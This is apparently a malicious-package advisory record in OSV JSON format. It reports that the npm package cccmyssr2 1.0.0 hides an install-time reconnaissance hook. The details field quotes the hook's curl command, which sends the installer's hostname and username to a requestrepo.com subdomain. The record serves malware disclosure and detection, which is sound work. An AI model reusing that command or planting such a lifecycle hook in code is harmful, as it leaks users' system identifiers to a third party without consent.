{"id":"MAL-2026-6391","summary":"Malicious code in cccmyssr2 (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (bd052408bb36e56e940e50ba81f7054844bc91dc0b32eaead5d15ca67f9b5c03)\nOn `npm install`, the package's postinstall.js executes `curl \"http://r1x55270.requestrepo.com/pre?h=$(hostname)&u=$(whoami)\"`, transmitting the installer's hostname and username over plain HTTP to an attacker-controlled requestrepo.com subdomain (a known DNS/HTTP exfiltration canary service). The package otherwise has no real functionality: index.js is a trivial 3-line date stub, package.json carries placeholder metadata (\"A harmless utility package\", empty author). The lifecycle hook fires automatically during install without consent, leaking host identifiers to a third party. This is the standard install-time reconnaissance/exfiltration shape.\n","modified":"2026-06-24T15:16:27.251364050Z","published":"2026-06-24T14:07:34Z","database_specific":{"malicious-packages-origins":[{"source":"amazon-inspector","versions":["1.0.0"],"id":"IN-MAL-2026-007440","import_time":"2026-06-24T15:01:18.165507252Z","modified_time":"2026-06-24T14:07:34Z","sha256":"bd052408bb36e56e940e50ba81f7054844bc91dc0b32eaead5d15ca67f9b5c03"}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/cccmyssr2/v/1.0.0"}],"affected":[{"package":{"name":"cccmyssr2","ecosystem":"npm","purl":"pkg:npm/cccmyssr2"},"versions":["1.0.0"],"database_specific":{"indicators":{"evidence_files":[{"sha256":"82b3b4ccf531cf849693156557795aed99763487a1cb57de999bae846392fb47","tlsh":"0fb02ba21a880620fa00d0803c70536b7453d350e30805d0d8000040314c0cb0253fe5","path":"postinstall.js"},{"sha256":"842b1ee3fcfaa3be31e2915f8876ec7fe3254a104f3bd04e7250af1448c46884","tlsh":"e9d0a7244e21967334c05b5a1a13454675255d5b01147c1c17d7190c53de37344ff319","path":"package.json"}],"package_integrity":[{"filename":"cccmyssr2-1.0.0.tgz","hashes":{"sha512_sri":"sha512-uuKZzhcsRM5v4DI0kBM1hYcvTN7BLkXtyTab5RRTTcTqD/qyfZPjs8vsVvj8duqCzTFXLhFE5QhSSreCSEuRlA==","sha1":"4e60c743f679f477bada8365f6ffbd36b5bfa528"}}]},"cwes":[{"cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code"}],"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/cccmyssr2/MAL-2026-6391.json"}}],"schema_version":"1.7.5","credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"}]}